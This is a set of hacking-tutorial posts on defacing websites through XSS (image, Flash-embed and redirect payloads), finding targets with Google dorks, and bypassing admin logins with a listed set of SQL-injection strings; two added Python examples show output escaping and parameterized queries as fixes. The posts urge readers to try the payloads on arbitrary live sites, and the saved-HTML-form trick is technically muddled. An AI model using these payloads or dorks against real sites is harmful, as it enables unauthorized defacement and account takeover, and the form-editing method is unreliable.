How to Deface a Website using XSS ?
By : Unknown
Now that you understand how XSS works, we can explain some simple XSS deface
methods. There are many ways of defacing; I will mention some of the best and most used.
The first one is IMG SRC. For those of you who don't know HTML, IMG SRC
is a tag that displays the image linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
OK, now if you change the link to a valid picture link, save it and run it, you will see what I mean. Now say you have found a shoutbox, comment box, or anything
that shows your data after you submit it; you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed, as the page will already have them. It helps to
make your picture big so it stands out and it's clear the site got hacked. Another method is using Flash videos; it's the same as the previous method, but a more stylish deface.
<EMBED SRC="http://site.com/xss.swf">
That will execute the Flash video linked to it. Or maybe use a pop-up or redirection, such as:
<script>window.open( "http://www.ashacks.blogspot.com/" )</script>
There are many other ways that you can find using Google or other websites.
My purpose is to make you understand the concept :)
XSS ATTACK
By : Unknown
How to Find XSS Vulnerabilities:-
To start finding these vulnerabilities you can start checking out blogs, forums, shoutboxes, comment boxes, search boxes; there are too many to mention.
Use 'Google Dorks' to make the finding easier. If you want to get cracking, go to google.com and type inurl:"search.php?q="; that is a common page and has a lot
of results. Also note that most sites have XSS vulnerabilities; it's just a matter of having a good
eye and some good knowledge of how to bypass their filtering.
Basics of XSS:
Now let's start learning some actual methods. The most commonly used XSS
injection is:
<script>alert("ASHACKS")</script>
This will show a popup message saying "ASHACKS" without quotes.
So, use "search.php?q=" and you can simply try the following on a website with the
same thing:
http://website.com/search.php?q=<script>alert("ASHACKS")</script>
There is a good chance of it working, but don't be worried if it doesn't; just try different sites. You can insert HTML, not just JavaScript:
http://website.com/search.php?q=<br><br><b><u>ASHACKS</u></b>
If you see the bold text on the page and the newlines, then you know it's vulnerable.
Example:
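The output-encoding fix for both cases on this page, the reflected search.php?q= parameter and the stored shoutbox/comment entry, as an added example that is not code from the original posts. The WSGI app, the /shoutbox path and the SHOUTS store are assumptions made for illustration; the sample inputs are the strings quoted above.

```python
import html
from urllib.parse import parse_qs, urlencode

# Defence in depth if an encoding bug slips through: no inline script,
# no plugin content (<embed>/<object>), images only from this origin.
CSP = "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'"

SHOUTS = []  # stored comments (constructed sample store, hypothetical)

def app(environ, start_response):
    """Minimal WSGI app: /search.php reflects q, any other path lists SHOUTS."""
    params = parse_qs(environ.get("QUERY_STRING", ""))
    if environ.get("PATH_INFO") == "/search.php":
        q = params.get("q", [""])[0]
        # html.escape turns < > & " ' into entities, so the value is shown
        # as text and never parsed as markup.
        body = f"<p>Results for: {html.escape(q)}</p>"
    else:
        items = "".join(f"<li>{html.escape(m)}</li>" for m in SHOUTS)
        body = f"<ul>{items}</ul>"
    start_response("200 OK", [
        ("Content-Type", "text/html; charset=utf-8"),
        ("Content-Security-Policy", CSP),
        ("X-Content-Type-Options", "nosniff"),
    ])
    return [f"<!doctype html><html><body>{body}</body></html>".encode("utf-8")]

def fetch(path, q=""):
    """Call the app in-process; return (response headers dict, HTML text)."""
    seen = {}
    def start_response(status, headers):
        seen.update(headers)
    environ = {"PATH_INFO": path, "QUERY_STRING": urlencode({"q": q})}
    text = b"".join(app(environ, start_response)).decode("utf-8")
    return seen, text

if __name__ == "__main__":
    SHOUTS.append('<IMG SRC="http://site.com/yourDefaceIMAGE.png">')
    print(fetch("/search.php", '<script>alert("ASHACKS")</script>')[1])
    print(fetch("/shoutbox")[1])
```

Both inputs come back as visible text rather than markup, and the response header tells the browser to refuse inline script, plugin content and off-site images even if an unescaped value reaches the page through some other template.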
hack Website with Basic HTML Coding
By : Unknown
Edited by June, Chris Hadley, Max1508, Skycaptain95 and 59 others
If you have basic HTML and JavaScript knowledge, you may be able to
access password-protected websites. This article will give you an easy
method to hack simple, less-secured websites of your choice simply
through HTML. Use it responsibly.
Note: This basic method works only for websites with extremely low security barriers. Websites with robust security details will not be susceptible to this kind of simple attack.
Steps
1. Open the site you want to hack. Provide a wrong username/password combination in its login form (e.g. Username: me and Password: ' or 1=1 --). An error will occur saying wrong username/password. Now be prepared; your experiment starts from here.
2. Right-click anywhere on that error page and go to View Source.
3. There you can see the HTML coding with JavaScript.
   • There you will find something like this: <_form action="...Login....">
   • Before this login information, copy the URL of the site you are on (e.g. "< _form..........action=http://www.targetwebsite.com/login.......>").
4. Then delete the JavaScript from the above that validates your information in the server. (Do this very carefully; your success in hacking the site depends upon this, i.e. how efficiently you delete the JavaScript that validates your account information.)
5. Then take a close look for "<_input name="password" type="password">" [without quotes] and replace "<_type=password>" with "<_type=text>". If the maximum length of the password is less than 11, then increase it to 11 (e.g. : if then write )
6. Go to File => Save As and save it anywhere on your hard disk with the extension .html (e.g. c:\chan.html).
7. Reopen your target web page by double-clicking the 'chan.html' file that you saved on your hard disk earlier.
   • You will see some changes in the current page compared to the original one. Don't worry.
8. Provide any username [e.g. hacker] and password [e.g. ' or 1=1 --]. You have successfully cracked the above website and entered into the account of List user saved in the server's database.
easiest method without any software....sql injection...
By : Unknown
Exploiting Web Applications by SQL Injection (Step By Step Tutorial)
Hello readers. Today I am sharing with you how to
exploit a web application by SQL injection attack. In this post I show
you, step by step, how to bypass admin login using some queries.

What is SQL Injection?
SQL Injection is a code injection technique that
exploits a security vulnerability occurring in the database layer of an
application. The vulnerability is present when user input is either incorrectly
filtered for string literal escape characters embedded in SQL statements or
user input is not strongly typed and thereby unexpectedly executed. It is an
instance of a more general class of vulnerabilities that can occur whenever one
programming or scripting language is embedded inside another. SQL injection
attacks are also known as SQL insertion attacks.
[Step – 1] Find SQL Injection Vulnerable Website
First we need a site vulnerable to the attack. This is the first step in SQL injection exploitation and, like every other hacking attack, is the most time-consuming step, and the only time-consuming one.
1) By Google Dork
Google dorks are the center of Google hacking.
Google's database is the biggest, so hackers exploit that database by using
various search engine commands or complex search queries to locate sensitive
data and vulnerable devices on the internet. For example, use this Google dork
to find random websites vulnerable to SQL injection.
There is a large number of Google dorks for basic SQL injection. Here are the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
After this you will see many websites in the Google search results.
Try the SQL injection on these.
[Step - 2] SQL Injection Queries
Here is a list of some popular SQL injection queries. We
can use these to bypass login authentication. These queries confuse the
database.
'or''='
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
hi" or "a"="a
hi" or 1=1 --
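Why these strings work against a login built by string concatenation, and why they fail once the query uses bound parameters and all checks run on the server, which applies to both the saved-HTML-form steps and the query list above. This is an added example, not code from the original posts; the users table, the sample account and the function names are assumptions, and the inputs are strings quoted on this page.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 100_000

def make_db():
    """In-memory users table holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"S3cret-sample", salt, ITERATIONS)
    # The plaintext column exists only so the vulnerable query can be shown.
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("admin", "S3cret-sample", salt, pw_hash))
    return db

def login_vulnerable(db, user, password):
    """'Before': input is pasted into the SQL text, so a quote ends the literal."""
    sql = ("SELECT name FROM users WHERE name = '" + user +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_hardened(db, user, password):
    """'After': server-side checks, bound parameter, salted hash comparison."""
    # Length limits are enforced here; the form's maxlength and JavaScript
    # run in the visitor's browser and can be edited away.
    if not (0 < len(user) <= 64 and 0 < len(password) <= 128):
        return False
    row = db.execute("SELECT salt, pw_hash FROM users WHERE name = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    row[0], ITERATIONS)
    return hmac.compare_digest(candidate, row[1])

# (username, password) pairs using strings listed on this page.
PAGE_INPUTS = [("me", "' or 1=1 --"), ("hacker", "' or '1'='1"), ("admin'--", "x")]

def compare(db):
    """Return [(vulnerable_result, hardened_result), ...] for PAGE_INPUTS."""
    return [(login_vulnerable(db, u, p), login_hardened(db, u, p))
            for u, p in PAGE_INPUTS]

if __name__ == "__main__":
    print(compare(make_db()))
```

With a bound parameter the whole input is compared as a single value, so the quote characters never reach the SQL parser, and editing the form in a saved copy of the page changes nothing the server relies on.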